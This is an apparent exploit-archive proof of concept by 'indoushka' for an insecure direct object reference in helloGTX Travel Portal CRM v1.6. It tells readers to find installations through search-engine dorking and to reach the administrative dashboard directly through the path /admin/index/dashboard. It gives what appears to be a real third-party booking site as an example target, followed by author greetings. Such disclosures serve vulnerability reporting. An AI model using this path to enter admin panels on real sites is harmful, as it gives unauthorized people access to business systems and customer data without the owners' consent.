====================================================================================================================================
| # Title     : helloGTX Travel Portal CRM v1.6 Insecure Direct Object Reference Vulnerability                                     |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | 
| # Vendor    : https://www.hellogtx.com/                                                                                          |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] suffers from an insecure direct object reference that allows users to access the administrative interface.

[+] use payload : /admin/index/dashboard

[+] Watch only without editing

[+] https://wwholidaysbookerscom/admin/index/dashboard

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================